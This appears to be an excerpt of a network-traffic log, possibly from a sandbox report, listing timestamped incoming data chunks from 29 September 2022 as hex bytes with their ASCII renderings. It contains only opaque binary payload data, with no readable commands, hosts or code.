                                                                                                                                                2022-09-29 12:51:37 UTC13925INData Raw: de 0e 01 f4 2b 41 b9 46 f6 71 6f b4 a3 ad 65 c0 da 98 37 78 82 6f c3 02 7a 93 5c 57 19 02 00 4a f7 a4 81 e2 ce 90 f7 d3 45 fd 51 60 4f 6a cd 44 53 d7 e8 d5 3d af 78 3a bc c2 e3 d7 f7 9b e7 32 2c 3d e2 fc 29 00 b4 4b 01 9f 1b 6e e5 24 6a dd 32 0f 23 46 02 94 27 7e 80 26 5e 18 9e 50 d7 72 0f 7f 1c f6 47 64 d8 a9 0a 70 41 69 1f f2 e2 01 41 94 df ed a5 90 d1 fc 1f 79 93 42 85 f5 5c 2b 24 4d fc 09 3a b2 cd bb d8 5d b9 fb a9 01 ff c8 48 53 e5 cb c5 b0 93 7d 2c c2 5a ce 97 b0 d5 dd 4d 93 43 ed 86 9a 21 9c af 34 94 21 08 0e ef 88 bf d2 7f 94 db ff d8 b7 b1 3b 3b 2f f6 28 8c 0e aa fe 14 69 16 2d 03 56 aa 17 89 30 48 d2 5f 9c 00 fa 25 8c 69 1d da 5d 01 81 16 7b bb 07 df b9 43 be db 26 3a f1 90 69 19 fc 7d 18 0b 46 5c b6 02 1d f8 cf f2 6a 69 5d 42 76 d5 da 38 71 4b
                                                                                                                                                Data Ascii: +AFqoe7xoz\WJEQ`OjDS=x:2,=)Kn$j2#F'~&^PrGdpAiAyB\+$M:]HS},ZMC!4!;;/(i-V0H_%i]{C&:i}F\ji]Bv8qK
                                                                                                                                                2022-09-29 12:51:37 UTC13941INData Raw: b9 02 37 2e a3 23 b2 b5 80 a2 cf db 14 df d0 de 0d 37 5e 42 4d 91 49 02 e3 2d 33 13 65 c7 87 ed 90 6f 99 dc a6 7f ec b2 48 ba cb 10 1b 30 90 8f 0e ee 4b 1a 3d 32 97 d3 28 be fe 96 3b ae 7b d9 ec 58 f0 9b e9 32 4a 93 46 ce 39 65 d4 d7 78 b0 cd ae b6 38 ea c9 a7 ef f3 4d d5 cd e1 fc 32 6d bb 83 8a c4 5e e4 7c e2 4c b7 32 a4 79 87 85 f8 c7 d7 ce 61 44 4a a7 6c 1a 49 6a 37 a9 94 ac 02 e1 02 d4 15 c9 f8 a6 79 d0 47 4d 5b 50 8f 38 b0 a8 c6 eb f5 df de 9d c9 aa 45 8b 1a 36 5c 2e c1 a3 c2 0d 24 96 41 b0 6c 94 44 33 cd 73 12 cd 19 93 47 c3 a5 1d c3 e7 e7 8e 43 30 a5 7a 1b d9 e2 a5 b0 81 37 dd db b9 27 39 ec 9f 7e 1b 22 d7 41 42 24 f7 5f 7e db 11 bf c7 f2 0a cb 68 fc bf 4b 98 1e 0e 3a ab 8c 94 57 f2 08 69 d9 34 2f ce 59 98 5c 67 32 7e 21 6d cb 76 23 65 5d 19 9e d9
                                                                                                                                                Data Ascii: 7.#7^BMI-3eoH0K=2(;{X2JF9ex8M2m^|L2yaDJlIj7yGM[P8E6\.$AlD3sGC0z7'9~"AB$_~hK:Wi4/Y\g2~!mv#e]
                                                                                                                                                2022-09-29 12:51:37 UTC13957INData Raw: 08 37 e0 8c 9a ff 4f 4b 5e 27 55 f2 17 c6 8c 77 87 30 06 75 56 8b e3 a5 7b 83 20 66 e2 e3 7b f4 41 3b d8 00 de 44 b1 98 87 29 88 16 d5 2a b8 9a 1d 34 fc f7 67 35 95 92 be 16 28 ba ad ec f3 dc 9a 1a ad 9a e2 60 af e5 d5 76 e2 ce 9c 25 33 1b 6d 06 d8 c9 5e c5 0a 44 4e 6a 3e e5 cc 47 cd c7 ef ee bb 05 9c 00 5c e7 2a 79 29 e3 35 43 af 38 c1 cc 81 a9 da 3d b4 19 39 9a 41 cd 9a 5a e4 c2 cb 9e 29 c8 b7 a9 60 94 58 15 23 50 85 16 f9 dc 0b ed 8f 7a 25 1c 96 17 c2 c7 32 0f 7e cd 9e 54 9f 9b 0e bd ec fd bd 42 01 6c 87 b6 d0 b6 20 4e ea 70 40 3f 9e 12 a3 c7 c1 90 96 79 65 60 2c 2a 93 10 18 cc 60 25 48 f4 5f af d6 55 26 57 cb f3 9d 78 5d 4f 63 9e 45 b2 e6 f1 ff a4 c1 23 14 b3 8e 29 d1 6b ad 0c 3b 9a 94 5d 55 09 c9 9d fc 29 80 cc c8 69 3b bc 98 c8 af 17 4c 02 e4 52 4a
                                                                                                                                                Data Ascii: 7OK^'Uw0uV{ f{A;D)*4g5(`v%3m^DNj>G\*y)5C8=9AZ)`X#Pz%2~TBl Np@?ye`,*`%H_U&Wx]OcE#)k;]U)i;LRJ
                                                                                                                                                2022-09-29 12:51:37 UTC13973INData Raw: 44 57 9f 5e 19 e3 42 4e be 93 99 e0 04 12 ae 37 50 cb b8 7b 91 c8 fc 76 29 0a 34 df fc 7e e6 da fa 2a 14 48 97 72 b2 16 34 3d 18 43 9b 42 64 47 88 d0 51 42 8a d3 81 85 fe 11 68 20 1f 3b 65 77 e9 e9 6a f0 cc 1e 51 8a cd 0d bb 31 f6 46 bc 7e 71 0a b7 dd ad 29 9d dd 2e 86 b5 b9 8d 1b 95 2e fa 1e cd e3 77 37 98 33 85 76 88 0d d3 8c 56 db 18 f4 ab 76 ce 04 68 e3 c9 b1 41 a3 5d 12 86 a1 9b 9f ae ca 2c 2c 57 35 de 95 06 d6 7e b0 d8 49 1d 86 9f 08 e3 bd d6 f8 a7 94 87 40 ba c0 a8 53 02 40 e4 1d 35 4c 68 55 21 24 29 f0 32 7f a4 67 d2 84 59 59 6b 69 d0 eb 56 97 9d 7e 56 3c 9b b9 18 bd 8d 66 58 3f 54 42 ff ff d0 1a 1e 78 3e 17 46 cc 77 f7 82 dc e0 99 1c c0 ae f7 0f 43 43 bf ea 51 ec 92 7a a2 d0 c8 c7 f9 43 34 e2 7d fa 64 c8 30 cd 64 a2 ac 64 22 92 42 f9 c7 96 91 6b
                                                                                                                                                Data Ascii: DW^BN7P{v)4~*Hr4=CBdGQBh ;ewjQ1F~q)..w73vVvhA],,W5~I@S@5LhU!$)2gYYkiV~V<fX?TBx>FwCCQzC4}d0dd"Bk
                                                                                                                                                2022-09-29 12:51:37 UTC13989INData Raw: 21 31 4c 33 59 8b 2f 11 4a 2f 86 25 d8 3c 95 ad fc b2 0a fa 9d 7a d7 8e 53 cc 84 60 b2 eb 96 90 b3 42 e3 79 e2 9f be 56 d1 2a de 52 4d 52 c5 e9 1e b4 38 d7 2c de 38 a5 37 64 82 37 7d d9 6f 80 82 3f 60 99 eb 92 5a db 4c 5a 9d 89 06 f5 ba 24 a2 0f e2 5d 44 b9 98 8e c5 c6 df 5a 2d 4c a2 5f 32 fa ed 9d 13 8f 1b 9f f9 e4 30 00 96 c7 96 0f 5d 07 74 2d e9 28 8c 5a 69 e7 9b aa 9b 25 9d f5 ef f3 0b 0b bd ce 16 52 38 3f 74 d0 8b dc da a8 9e 99 11 1c 18 40 49 c1 b5 36 b4 39 27 79 2a a7 4e b1 78 17 45 0b d1 2c 15 f0 c8 42 05 c3 38 92 93 b5 3a 90 33 fe 11 51 40 d7 95 01 97 58 08 48 dc 7e 8d 19 cd 19 c7 3d 30 7f b2 11 b1 30 8c cd e0 bd 6b c2 e9 9e 10 94 29 57 01 ff fe 59 94 01 d3 6a 2f ff b8 d4 43 99 07 ec a6 b8 b0 ef 5a 9f 9a d9 71 46 21 20 98 4b c4 97 72 8b 89 cd 31
                                                                                                                                                Data Ascii: !1L3Y/J/%<zS`ByV*RMR8,87d7}o?`ZLZ$]DZ-L_20]t-(Zi%R8?t@I69'y*NxE,B8:3Q@XH~=00k)WYj/CZqF! Kr1
                                                                                                                                                2022-09-29 12:51:37 UTC14005INData Raw: 85 64 d9 7d 46 c8 39 81 93 61 1a 6e 26 70 42 57 b9 2a 7e e6 b1 50 e5 b4 4c ad b9 9e c6 65 00 7e 95 30 4b 07 43 ff 26 b4 37 6f a5 7d af c4 0a 1b 5f 5c 93 60 94 90 67 9c a5 9a 83 27 c9 5b 03 e7 29 31 e2 a9 87 57 50 48 03 ac 88 be 22 78 49 d1 fa 6c 27 6a d2 4a f4 2a ce 16 b1 6a ae 8b 18 40 44 ba fa 32 2c 2d 21 42 90 bf 51 1a 39 09 c6 69 bd 48 50 65 ca c0 c8 46 e1 ec 5e 43 42 82 91 16 f7 d7 c0 80 a9 b4 d4 47 6e f2 63 4f 36 8a 0e 30 6a 0c 58 22 13 a6 c4 3f bc 9a 88 30 8c 12 75 34 c3 6b 66 c4 d5 13 5e 1e 85 10 8b 8d ea 9a d6 9d 57 7d 0b 66 14 f5 6b 60 41 27 c0 ce 9e 26 4f a1 89 7f be 4d b1 bf 7a fc 55 96 db 80 ba 33 d8 bd d8 99 be ee c8 0d 6f df 24 c8 1b 9f a7 a2 0f d6 9c 01 86 4b 76 85 c3 92 c7 c8 dc 2b c9 8c e6 32 c7 1f 99 17 2e ff 13 0e 8e 22 be a2 76 11 c3
                                                                                                                                                Data Ascii: d}F9an&pBW*~PLe~0KC&7o}_\`g'[)1WPH"xIl'jJ*j@D2,-!BQ9iHPeF^CBGncO60jX"?0u4kf^W}fk`A'&OMzU3o$Kv+2."v
                                                                                                                                                2022-09-29 12:51:37 UTC14021INData Raw: 8c 7f 77 df 97 47 66 89 5d 43 6a 3e dc eb 63 a4 47 5e 76 c5 3f 51 59 93 db 2e 1d e1 fe 4f cb 55 e5 4a bd dd 80 31 a0 11 ad 3f 8d 6a 53 24 72 05 fa b6 a7 23 aa 02 a1 3a 31 6a b8 72 dd ac 5c d9 b4 6b 68 43 0a 2d ed b4 82 5e 8a 89 1f f2 43 a5 f4 47 43 29 e7 72 7e 5d 89 c5 bb 09 25 02 78 bd 4f 44 06 2a 33 98 1a aa eb ef 14 ef 19 4a 6f 7e 69 5b 16 5a 6e 61 4d 01 0d 3a 76 f9 55 ea 6b b4 45 e3 b8 59 6d 47 63 1f fa 0b 3b 96 0e 52 ad 3d a0 a3 11 f1 84 03 38 36 90 72 07 ff 11 0e 14 e7 a0 e3 15 ac 08 00 9c 9d 15 c9 16 58 b9 9a 63 9d 7c a7 d5 46 08 af a4 9a 91 ef ce 80 26 73 59 f6 21 29 26 90 29 49 69 ff b5 c1 9c ab a7 ce e0 4a 24 84 14 25 a1 c0 cf 91 c3 d5 39 ae 97 a3 6c 61 f2 e0 07 f9 58 00 81 e9 2e 4e d3 e1 86 0b 84 09 f4 5c 4f a6 9b 28 1b 9d 36 c6 4a 1e 34 dd 4a
                                                                                                                                                Data Ascii: wGf]Cj>cG^v?QY.OUJ1?jS$r#:1jr\khC-^CGC)r~]%xOD*3Jo~i[ZnaM:vUkEYmGc;R=86rXc|F&sY!)&)IiJ$%9laX.N\O(6J4J
                                                                                                                                                2022-09-29 12:51:37 UTC14037INData Raw: 64 ca 10 ea a8 a4 f5 f6 38 c1 a7 61 96 ed e2 bc e3 66 83 b3 97 7d 3c f1 03 96 dc 21 65 a6 a5 50 69 d9 48 3c a1 83 89 28 1d 33 44 7f a9 76 d0 fb f3 56 25 9a 9b 00 89 1e a1 bc 33 d4 60 09 75 12 82 84 98 30 ce 62 18 f0 97 d3 72 f5 e1 84 e2 74 44 ab 4e 3a 56 93 1a 06 94 04 55 af ce 8a c8 1d 6e 65 c2 ec 0e 55 49 21 01 03 d5 4f 28 83 5b ac 1a ec 63 7f 62 bd 6e 8b cf 45 a7 a1 9e d5 23 e0 78 66 c0 7c cd d4 9b d5 00 38 d6 c6 01 e0 7f 92 81 ea 03 3d c4 ae 51 90 fc cf 63 6e 61 d8 14 a5 7f c6 a9 5a 3c 7f c7 5d d0 65 0a 27 77 fc 4e bc 4c dc 28 35 35 5f cb 5e f0 0c ac 6c a2 02 a8 d7 73 1a 03 e0 86 75 ee a8 53 27 2c 86 52 7f e9 5f 3a ca 09 c7 ea cd 7d 5b 3e b0 d8 c3 fe 9d 7a df 06 5d d3 2d 23 42 d4 ff 59 ae f1 6d 6c 64 88 15 63 e2 ca a5 1e 91 5d bb ee 57 fd 33 6c bd 50
                                                                                                                                                Data Ascii: d8af}<!ePiH<(3DvV%3`u0brtDN:VUneUI!O([cbnE#xf|8=QcnaZ<]e'wNL(55_^lsuS',R_:}[>z]-#BYmldc]W3lP
                                                                                                                                                2022-09-29 12:51:37 UTC14053INData Raw: 78 c0 cb 63 9d 79 b9 e8 7d 3b 7d 22 18 e7 81 20 b1 8f 47 0d bc ff 6b c1 81 63 55 a0 8b 6e 97 57 a1 d4 a7 c3 80 2e 8d 15 65 5f 37 da 64 d2 46 e0 44 09 bd 29 25 00 5e 36 cf c0 27 ee 2a 39 84 f3 7f 50 fa f2 ef 54 f1 dd fe df 6b 73 56 6b 63 e5 f9 48 44 7f 57 7e 80 09 fc b2 d2 f9 86 52 92 f4 a7 df d2 87 7b 02 77 e8 e1 6b a7 23 91 ea c9 ab af 83 ba a5 c6 c6 10 f1 fc d5 e0 58 93 ea 63 2d c9 47 5a c3 9a 37 2a ae 33 91 9f e2 ae 57 58 92 5f 7c ca 59 ac e1 5d f7 39 31 78 c4 77 3f 40 41 9d cf ba d6 cd b1 3c 5e 40 83 a0 3c 24 fd 1b 8c 69 ea 95 01 9a bb 80 0f 48 29 46 99 7a 93 50 55 f8 aa 83 54 30 c6 36 ff 81 10 8e 55 74 58 b7 3f 47 98 a8 2f ad 57 63 e4 47 05 e7 54 b6 9e 6b 0e bd 7a 17 2a a8 9c 58 4b cd 8a 59 ff 7a 7a 59 0f ae 10 58 1d 84 dc d2 31 ad 11 a0 50 e6 ec d0
                                                                                                                                                Data Ascii: xcy};}" GkcUnW.e_7dFD)%^6'*9PTksVkcHDW~R{wk#Xc-GZ7*3WX_|Y]91xw?@A<^@<$iH)FzPUT06UtX?G/WcGTkz*XKYzzYX1P
                                                                                                                                                2022-09-29 12:51:37 UTC14069INData Raw: aa af a7 85 a5 31 36 95 90 91 89 44 1e 0b fa fb 17 3b 58 9a a4 75 ee 01 28 67 81 0c 82 34 93 ae d4 57 f2 be 18 99 67 02 85 70 59 2e 7a 4e 44 cd 26 17 74 3d 03 77 5a 8f f9 67 49 94 f9 d3 26 31 e2 05 d0 6e 5a fb a3 0e fd 60 3e 31 73 70 55 76 c0 15 50 c6 20 1d 80 6c a2 8d 86 46 5c 23 f8 6c 23 77 95 25 9e 82 16 99 58 08 2a a1 e4 0b 9d 85 e6 85 50 75 91 f8 09 a0 18 f4 34 a0 34 e7 23 b5 c7 61 f8 4f c7 8a d0 d7 a1 18 af 99 7f 3d 09 7c b1 b9 dc a2 1c 72 be 91 85 ed c5 54 be ad 6c d3 f0 e1 9a 54 4c 77 6d e5 b1 bd 5a 7a 28 2e 69 5a 03 39 5c 4d bb 83 3d 00 b0 1e 77 86 31 f4 78 24 2d 87 b1 71 16 5d 2e 93 59 58 0b f5 ed c1 3b 6c ab 79 42 8a ad 00 61 5d 62 8c b1 08 c3 10 a7 f9 96 e1 37 2d 0b d8 35 ef 00 de 41 8e 56 ca 7a ec 10 3b c6 0d 16 52 b6 80 14 8e 7b 59 20 f2 d9
                                                                                                                                                Data Ascii: 16D;Xu(g4WgpY.zND&t=wZgI&1nZ`>1spUvP lF\#l#w%X*Pu44#aO=|rTlTLwmZz(.iZ9\M=w1x$-q].YX;lyBa]b7-5AVz;R{Y
                                                                                                                                                2022-09-29 12:51:37 UTC14085INData Raw: da 28 70 57 43 55 2a ba 3f af 19 7a d6 a8 ea b9 0a 0b f9 91 16 31 39 92 56 80 f5 92 aa c9 89 48 02 ce 9d 44 09 41 22 f1 ef f3 4a f3 90 31 b7 af 71 a5 85 eb d6 37 78 33 64 c2 ac b2 82 bd bf 52 dc 63 85 89 b1 ac 50 63 96 24 f9 12 dd 9f a1 c0 3b ee 14 b8 40 8f dd 50 6e 4f 62 e2 a8 f0 d9 71 b0 63 e7 c6 3b 08 17 b0 3d 9c 7c f6 44 ac 8f 28 2b 9e 4b 68 16 13 b0 ce b7 71 fe 73 74 4c d8 8f fb 32 58 24 25 23 28 68 3c 9d 52 91 95 78 4c df 80 44 90 f6 aa 3d 05 39 39 ce a8 41 8f b3 bf 36 bd 52 42 7d f8 c5 b5 3f 70 24 48 39 01 44 bd 5c 08 d5 07 81 52 32 63 8c d8 7a ed f7 99 ff 69 c0 24 d2 aa 23 16 23 4e ca 93 d8 86 d1 25 ae 43 e8 14 9c a8 57 cb 66 16 93 ee f6 cb 5b 63 20 ec e5 98 1e 9a 89 9d d8 b2 09 80 b6 19 6c 72 69 40 22 79 c4 17 17 33 0b d1 ac 04 b9 65 99 a0 0f 74
                                                                                                                                                Data Ascii: (pWCU*?z19VHDA"J1q7x3dRcPc$;@PnObqc;=|D(+KhqstL2X$%#(h<RxLD=99A6RB}?p$H9D\R2czi$##N%CWf[c lri@"y3et
                                                                                                                                                2022-09-29 12:51:37 UTC14101INData Raw: 54 ee 36 5c 99 4c 89 71 ba 73 aa 26 a1 8f c9 82 c7 23 05 e7 10 dc 99 46 d6 5c f5 d1 d6 80 5d 68 79 81 37 be 0f c8 0e 40 dc 59 b1 af 03 a1 0b 57 46 06 dc a2 ec 15 75 98 b1 4d dd 4c 53 f2 0b a8 cd 6f 7f db 92 ea 9e 59 5c b5 e2 34 f0 bc 61 4c 10 7b 93 f4 b7 4c b8 e1 ff c0 44 f0 5c 6b a3 01 dd 70 f0 d6 0f 08 46 fa 71 e6 93 8b db a6 9a 51 fd 3d 4d f1 65 fa 81 0a 5d 73 ca b4 1e 45 2f 51 06 a5 20 e8 71 5b af 93 51 0a a3 3f 21 e5 bc d3 52 bd 42 d8 9a 07 88 8b a4 01 6c 6a 68 e7 8f 5f 83 74 d8 fe fb de b0 e5 82 03 50 f6 aa 04 33 1f 52 be cc 9d 22 68 f7 7c 99 bf db 64 23 e2 05 db 89 81 4c 20 db bf 5a 25 84 2c b8 52 4d 29 c2 e0 80 c7 72 ab 18 4d 1c 8c 6e a6 f4 bc 9b 0b 87 da 8d cc c7 12 29 b1 0f 1a a2 e5 4c 19 36 01 95 5b 04 37 d8 2b 82 74 ad 1e 3e ee ff 5e c1 89 bd
                                                                                                                                                Data Ascii: T6\Lqs&#F\]hy7@YWFuMLSoY\4aL{LD\kpFqQ=Me]sE/Q q[Q?!RBljh_tP3R"h|d#L Z%,RM)rMn)L6[7+t>^
                                                                                                                                                2022-09-29 12:51:37 UTC14117INData Raw: 3a 3f b2 6f 30 2c d1 96 b2 cb 0c 77 ed 70 54 32 8a 8b e1 ad 6e 8d 72 fb 3a 37 8f d1 35 c2 73 10 97 02 20 db 02 a8 ed 12 95 6a 4a 60 31 90 4b 79 28 d1 28 bc 4e 72 3d 79 79 08 54 dc 89 c6 db 64 64 62 bb 32 b2 ca 56 bd 16 9f 7f 00 a1 b1 fb 66 30 b8 3f 89 b0 a8 bc f0 62 03 96 92 b1 fe 49 8a cc d8 f1 1c 45 43 54 a9 b3 53 85 b2 00 51 b1 be 6b 38 e0 14 cd 1d d0 c6 98 c2 fb ab 0c ce 95 1e 59 5e 38 f6 90 be 92 a7 d6 a8 60 73 23 7f f9 51 53 5f 10 ce dc bc 73 3e ac cd 27 f9 aa 87 c7 15 46 6e 18 d8 00 e1 76 81 d0 84 1e 06 c2 15 db a5 1a 22 09 91 3e e1 83 14 9a d7 62 88 c1 31 05 63 23 2f 84 24 35 93 2b 02 48 0d ed 1d ab 01 b2 df 87 37 9d 17 27 0a 3f 92 65 7e 0c 81 95 cf ac 2c dc 58 af d3 9f 0e bc 63 cc a9 2d 5d b7 6a e5 d3 f3 2b fc 18 8f a8 5d cc 46 c7 0a 4d d8 3b 30
                                                                                                                                                Data Ascii: :?o0,wpT2nr:75s jJ`1Ky((Nr=yyTddb2Vf0?bIECTSQk8Y^8`s#QS_s>'Fnv">b1c#/$5+H7'?e~,Xc-]j+]FM;0
                                                                                                                                                2022-09-29 12:51:37 UTC14133INData Raw: 37 f4 4b d1 8c 1a 2f 21 5d f4 57 2f 8e fa 67 91 11 db d1 00 23 10 4b de 30 53 9c 3f c3 c2 08 60 0b 3a 93 28 50 85 92 3c 2e 30 81 67 72 5c f5 c4 6a 62 af 6e 23 e6 2c 1c 13 ec 87 49 22 de 3d 64 7e d0 5a 94 e6 46 6f 82 67 c9 57 bd a9 17 9f e6 f1 15 c3 83 23 6e bc a5 6d 1a fc 37 f0 0b 84 d3 9e 5c 34 f6 24 aa 99 49 91 f8 e8 87 31 a6 73 9c fb f4 ec 6b ab e8 fc 43 45 f5 d4 7c bf b1 da e3 b0 78 3a eb 18 db 31 39 64 31 f0 0e fd 19 99 3f 3f 66 5d f9 87 15 f8 1a b8 ff aa 1f 92 96 c8 7b b0 99 5b e1 66 b4 0c e0 36 77 cc cc 51 c2 d4 ec 9c 23 13 c1 3a 0d c1 86 57 67 86 46 8f ae 3f 76 a1 4e 65 9c 66 59 94 c9 a0 99 7c 22 bf 1f d4 2e 4a a0 95 28 33 b0 4b 32 ef aa 1c b9 16 4e 92 c6 37 07 07 a8 82 32 f7 93 fe 0a b0 64 90 d0 b3 19 81 6a 05 9f fe f0 1e ea 78 4b 43 b9 94 0f ec
                                                                                                                                                Data Ascii: 7K/!]W/g#K0S?`:(P<.0gr\jbn#,I"=d~ZFogW#nm7\4$I1skCE|x:19d1??f]{[f6wQ#:WgF?vNefY|".J(3K2N72djxKC
                                                                                                                                                2022-09-29 12:51:37 UTC14149INData Raw: 25 ca 78 91 eb d7 21 21 ad c9 f8 94 c5 d6 ae eb b2 03 60 03 35 30 cc 7f 5f 96 7f 3f 91 08 d7 1f 17 e0 f2 c9 1e 89 b9 1c 4c 50 3f ee c8 f2 91 e0 7c fc e4 80 19 68 03 ab ea d9 b8 b9 0c 45 60 65 24 27 76 03 8b 38 42 89 0f 67 67 66 00 81 7e ff e8 29 81 ba 26 88 79 2a 18 2b d9 b4 87 3e 03 ec db 9c 78 3c 03 5a 8e 46 ca 2f 37 eb ed e1 4e c8 13 70 b2 5a 36 ca a2 19 c2 9f 0f 4f ad f3 c8 8b 17 ba b5 23 57 79 13 89 45 4d ff b4 40 12 be b2 df 78 5d 82 d3 9a 9d 25 1b e3 6a 96 fb 46 de cc 56 8c 01 06 7f ce b3 28 e5 60 3a 8f 21 b1 27 0f 6b d2 01 10 85 7b 1f 16 06 4e e3 5c 16 a0 93 5d 99 f7 65 07 40 4e 1a 8d 22 d3 94 8e d6 f2 d1 48 59 74 d2 96 de f0 f0 4d ca d6 65 47 f9 e7 60 be d7 73 38 8b 27 6b 67 6d 2e 71 48 dc 1a 90 44 bf d8 d5 1f b2 ec 8d 15 bf 60 74 d3 b6 10 5a f1
                                                                                                                                                Data Ascii: %x!!`50_?LP?|hE`e$'v8Bggf~)&y*+>x<ZF/7NpZ6O#WyEM@x]%jFV(`:!'k{N\]e@N"HYtMeG`s8'kgm.qHD`tZ
                                                                                                                                                2022-09-29 12:51:37 UTC14165INData Raw: 23 df db f3 cc 3e 1d 4c bc b8 bf a9 e5 1a a1 84 bf 04 b6 75 be cd a8 ef 9b 4a 70 92 1c 6f d8 65 e3 1d 44 f4 35 6c 8c 9b 81 81 d9 7c 22 79 4b 53 12 89 9e 50 e2 88 b5 6f d2 b9 40 1e b8 05 f2 cc 23 28 8a 35 77 25 80 b9 74 61 39 72 89 9f d6 09 b0 e0 11 a3 1b d4 b8 0b 37 fd 9a f1 72 c9 b5 e2 53 7e 9a b1 0e 4d a0 65 9f b9 ac 36 96 69 e9 f5 82 89 0f db 36 c7 76 25 32 0a 6b 46 e2 ab 59 69 90 7c f9 d4 be 9a f2 ee a8 aa c4 7e e7 d7 39 27 fe f4 c6 5b 7b 6c b2 d9 0e 4d 8c 29 36 ac e7 06 b4 84 27 59 68 31 c4 c1 77 50 b7 67 85 b1 f6 3b 48 8d 03 16 9e a8 fa 03 e9 01 4b 0c e8 61 f7 99 87 58 45 fc 39 7e 1d 6f 63 7f 66 20 d0 c6 36 c0 8f 56 fa e2 da c3 ad f3 26 c7 a7 af 80 6f 39 b7 ad 41 ee f7 58 af b9 91 5c 7b dc b5 f1 5c 0e 32 ef 93 f2 3e f7 b9 11 10 42 55 fc 9d 81 41 4e
                                                                                                                                                Data Ascii: #>LuJpoeD5l|"yKSPo@#(5w%ta9r7rS~Me6i6v%2kFYi|~9'[{lM)6'Yh1wPg;HKaXE9~ocf 6V&o9AX\{\2>BUAN
                                                                                                                                                2022-09-29 12:51:37 UTC14181INData Raw: 3d fb 2f 66 34 5e 36 f0 0d 49 8e f3 2d 1a 48 18 da 06 2b 3f 5f 7a 8d 7e 3f f2 28 13 1d 53 ce 6b 8e c3 f9 9e 9a 08 22 23 32 55 a1 35 9a 20 d4 de 1c 7a d0 c9 df 07 16 91 80 17 a5 82 d5 7d a2 92 c5 d1 02 cc e9 14 c8 c9 77 e0 65 d0 46 82 42 71 43 00 11 88 0e 20 f7 b8 79 39 70 d3 73 7c e2 0e dd 5d f4 86 b6 45 fa 9b 85 a5 04 3a b2 78 38 da 9b c1 c8 c4 22 23 2c f1 7b 4a 87 48 17 e3 75 83 98 fe 1e b8 26 3e 7b 31 e5 b7 14 e6 b1 5b 1f 9e cf e3 93 4d d6 e7 14 f2 64 27 82 57 33 04 93 76 22 d4 27 57 e2 8a 29 87 ee 2d 3b 0c 39 97 f7 0b 88 99 49 a6 3c d9 dc a8 0c fd 9d 74 22 d7 2f 0a 11 83 cf 9a 53 1c 81 39 96 62 2d e2 1e 18 27 57 dc 59 75 db 37 a1 c6 d5 eb 59 f5 f8 de f0 fb 38 9c c9 92 d9 24 62 e0 3d d2 cc bc 1f 30 5f 74 43 aa fd 53 1e 6f ae 15 4f cf 75 2d 35 68 5a 9d
                                                                                                                                                Data Ascii: =/f4^6I-H+?_z~?(Sk"#2U5 z}weFBqC y9ps|]E:x8"#,{JHu&>{1[Md'W3v"'W)-;9I<t"/S9b-'WYu7Y8$b=0_tCSoOu-5hZ
                                                                                                                                                2022-09-29 12:51:37 UTC14197INData Raw: b5 2b 37 3b df a7 50 3c f1 e5 ae be fa 37 08 7a 71 05 9f df 4f f3 e6 99 f6 6a 62 6c 10 0d 6e 04 5f 17 95 fd fa c9 03 63 d2 4a 53 c8 5f 71 56 b8 5d 03 24 ec 2e 1c ee 52 4e f1 50 f7 30 a7 7b 3c 52 66 28 fe ba c9 fe 18 f6 12 f4 cd 28 05 57 3c 50 29 5a 5e f9 2e 7f f8 0d 66 d1 8b b3 20 88 86 1e fc 6c 3e a3 ca 70 a0 60 eb 01 da 5e 85 df ba a1 da 8d b8 2e 01 09 fc 93 80 b6 7c 60 b0 9f af 02 4b 09 76 a2 8b 4b 1a 8f 68 e7 27 bc 63 33 06 33 05 ac b3 5e 74 20 bd bc 0f dd 44 83 b9 02 ef 71 21 fd 46 c2 3b c0 ed bd 2d c9 ca 07 b2 af dd 3b cd fe 8e d7 4d 29 78 b3 ee df d2 1c 68 6e 6d f7 a7 12 b4 ee 3a 6f 51 39 32 f0 a5 f1 86 e8 cf 8e f8 a0 df d7 24 64 71 99 34 42 29 21 35 34 01 81 0b d3 ee c4 4e 39 23 51 03 f6 a7 37 2d ad f8 41 5b dc 72 cb 68 9e e0 19 f6 a3 5d 07 6c 33
                                                                                                                                                Data Ascii: +7;P<7zqOjbln_cJS_qV]$.RNP0{<Rf((W<P)Z^.f l>p`^.|`KvKh'c33^t Dq!F;-;M)xhnm:oQ92$dq4B)!54N9#Q7-A[rh]l3
                                                                                                                                                2022-09-29 12:51:37 UTC14213INData Raw: 8d 3f 86 a4 9d a7 99 c1 10 de ba 01 91 5a af 1f 8b 6a e0 89 b8 c0 99 1c 04 f3 38 b8 30 ad 8e 55 c5 38 f4 e0 62 e3 1b 61 78 36 07 32 7c d9 ed 98 9a 71 4d f5 1d 45 7f 3f e1 04 29 62 6d 0c 48 11 45 af 7c f0 3d 07 4d c6 e8 3d 4d 1c 8a f7 b8 35 76 65 aa f5 58 97 2d 9d d2 1a 12 50 e9 60 06 cf ea 0b c0 c0 5b 3f be 5d d9 a5 1c 12 28 ca c6 0d 9b 5b b9 08 4f cf 86 f8 9b 0e 68 c2 21 9c a1 5f 05 b9 c3 ba 2e 82 cb 16 f1 80 76 68 30 e7 5f 13 0d 18 d0 5f c9 99 90 f2 59 13 5b bd 48 09 de 41 0f 7f 8f d0 0f 9f d4 ed 6f 3c a2 64 98 11 c0 69 18 1a 98 37 d5 1c af 6b 83 cd ce cf bc 35 2b 09 8a 03 3b 21 8d 98 cd 1c cd c7 ea 2c 85 5c 78 27 ba 5c 77 43 32 12 2a 9e 35 31 6b ac 20 77 14 57 06 13 ea 46 20 0e 37 86 75 d2 e4 d6 37 9e d2 e0 73 c1 06 3e 76 64 e8 8d 87 c9 f4 5f 49 b1 af
                                                                                                                                                Data Ascii: ?Zj80U8bax62|qME?)bmHE|=M=M5veX-P`[?]([Oh!_.vh0__Y[HAo<di7k5+;!,\x'\wC2*51k wWF 7u7s>vd_I
